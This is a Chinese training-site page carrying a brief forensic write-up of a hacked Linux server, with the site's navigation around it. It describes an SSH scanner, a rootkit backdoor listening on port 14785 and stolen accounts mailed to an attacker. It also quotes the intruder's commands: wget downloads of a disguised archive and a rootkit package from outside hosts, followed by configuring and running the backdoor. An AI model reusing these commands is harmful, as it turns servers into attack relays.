分析一台被入侵的linux服务器-计算机等级考试-计算机-珠峰网 www.my8848.com

珠峰网
广告合作：400-664-0084
全国热线：400-664-0084
爆料：nihao@foxmail.com
QQ:165687462
网站地图设为首页加入收藏

课
程

资
讯

综
合

网站首页 | 课程列表 | 机构列表 | 资讯列表 | 资料列表 | 网站地图
全日制高职高专 | 全日制本科 | 其它考辅 | 自考辅导 | 成考辅导 | 网络教育 | 自学考试 | 成人高考 | 高考 | 中考 | 中专 |
泰语 | 俄语培训 | 德语培训 | 汉语学习 | 粤语 | 出国留学 | 法语培训 | 日语培训 | 韩语培训 | 其它语言培训 | 专业日语考级 | 日语J.test | 日语能力考试 | 英语听说 | 葡萄牙语 |
计算机考试 | 计算机基础 | 环境设计 | 计算机辅助设计 | 速录速记 | 数据库开发 | 硬件维护维修 | 工程制图 | 网络技术 | 游戏动漫 | 程序设计 | 影视制作 | 动画设计 | 室内设计 | 平面设计 |
华为认证 | 其它认证 | J2EE培训 | 嵌入式培训 | Oracal认证 | Micromedia | Adobe认证 | JAVA认证 | SUN认证 | Linux认证 | Oracle认证 | IBM认证 | CISCO认证 | NIIT认证 | 微软认证 |
消防工程师 | 安全工程师 | 速录师 | 信用管理师 | 物流师 | 造价预算员 | 证券从业资格 | 二手车估价师 | 药学咨询师 | 管理咨询师 | 旅游咨询师 | 婚姻家庭 | 事业单位招考 | 保健协会认证 | 财务总监 |
会计实操 | 其他培训 | 统计师 | 会计实账 | 经济师 | 纳税筹划师 | 注册会计师 | 会计电算化 | 会计继续教育 | 会计职称 | 会计从业资格 |
娱乐健身 | 形象设计 | 招调工 | 其它技能 | 保健按摩 | 美发培训 | 电工/焊工 | 芳疗师 | 演艺 | 色彩美甲 | 挖掘机 | 数控机床 | 模具设计 | 建筑施工 | 装载机/叉车 |
SSAT | SAT | 冬/夏令营 | 学前教育 | 少儿培训 | 留学 |
企业管理 | 企业内训 | 物流硕士 | 同等学历考辅 | GCT考辅 | MBA考辅 | 考博 | 其它硕士 | 中外硕士 | 在职硕士 | 双学位 | 教育硕士 | 会计硕士 | 同等学历 | 法律硕士 |
游学 | 移民 | 留学 |

当前所在位置：珠峰网资料 >> 计算机 >> 计算机等级考试 >> 正文

分析一台被入侵的linux服务器

发布时间：2010/10/21 13:18:18 来源：城市学习网编辑：ziteng

　　客户反映一台linux服务器老向外ssh扫描，登陆到服务器上，查看进程发现大量ssh-scan在运行，运行用户为mircte，查找ssh-scan这个文件，确定所在位置/var/log目录下

　　黑客进入服务器后所做的操作：

　　1. 向/var/tmp/下上传了两个恶意程序

　　其中wtf为向外扫描其它服务器的ssh-scan黑客软件，.access.log文件下存放有rootkit后门，服务器被当成了肉鸡跳板，开放14785端口等待入侵者连接，扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。

　　2. 入侵者登陆记录

　　85.120.78.140的IP来自罗马尼亚。

　　3. wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg

　　wget adelinuangell.lx.ro/ryo.tar

　　tar xvf ryo.tar

　　cd .access.log

　　./config Ady 14785

　　./run

　　结束进程。删掉程序。。删掉用户。修改root密码。

珠峰网
关于我们
版权声明
广告服务
网站地图
会员专区
联系我们

广告合作：400-664-0084 全国热线：400-664-0084
Copyright 2010 - 2017 www.my8848.com 珠峰网粤ICP备15066211号
珠峰网版权所有 All Rights Reserved